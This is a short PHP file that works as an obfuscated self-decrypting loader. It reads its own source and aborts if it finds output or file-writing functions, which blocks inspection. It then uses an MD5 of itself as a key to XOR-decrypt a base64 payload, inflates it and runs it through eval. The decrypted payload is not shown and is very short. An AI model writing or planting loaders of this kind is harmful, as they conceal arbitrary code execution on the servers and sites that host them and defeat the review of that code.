<?php
$htkwckaqjxgt="7589705e5bcf2fc649811f7a43d8d476";
$zwnsetqtri="04035a5a5208575205075055000050040d000f00045e0f525050015c5c050554";
$zxxhpkocm="ePgrT0tuShl5SRplmjCbNzk=";
$kanagcpsewqp=file_get_contents(__FILE__);
$ymedceu=str_replace($zxxhpkocm,"",$kanagcpsewqp);
if(strpos($ymedceu,"ec"."ho")!==false||strpos($ymedceu,"pr"."int")!==false||strpos($ymedceu,"var_"."dump")!==false||strpos($ymedceu,"file_put_"."contents")!==false||strpos($ymedceu,"fw"."rite")!==false){die();}
$sexyhupsggo=str_replace(array($htkwckaqjxgt,$zwnsetqtri),array("SP_d1ce4d1a","KP_2da65cc5"),$kanagcpsewqp);
$pbgzmsfh=md5($sexyhupsggo);
$cydrddfonak=hex2bin($zwnsetqtri);
$axhcfmmsxq="";
$mvlhsofzutup=strlen($pbgzmsfh);
for($iipyuhh=0;$iipyuhh<$mvlhsofzutup;$iipyuhh++){
    $axhcfmmsxq.=chr(ord($cydrddfonak[$iipyuhh])^ord($pbgzmsfh[$iipyuhh]));
}
$zsowqofuftug=base64_decode($zxxhpkocm);
$sadszv=strlen($zsowqofuftug);
$exmonxvgejc="";
$vlzmeyoglr=strlen($axhcfmmsxq);
for($iipyuhh=0;$iipyuhh<$sadszv;$iipyuhh++){
    $exmonxvgejc.=$zsowqofuftug[$iipyuhh]^$axhcfmmsxq[$iipyuhh%$vlzmeyoglr];
}
$ezuengwbes="gz"."in"."fl"."ate";
eval($ezuengwbes($exmonxvgejc));
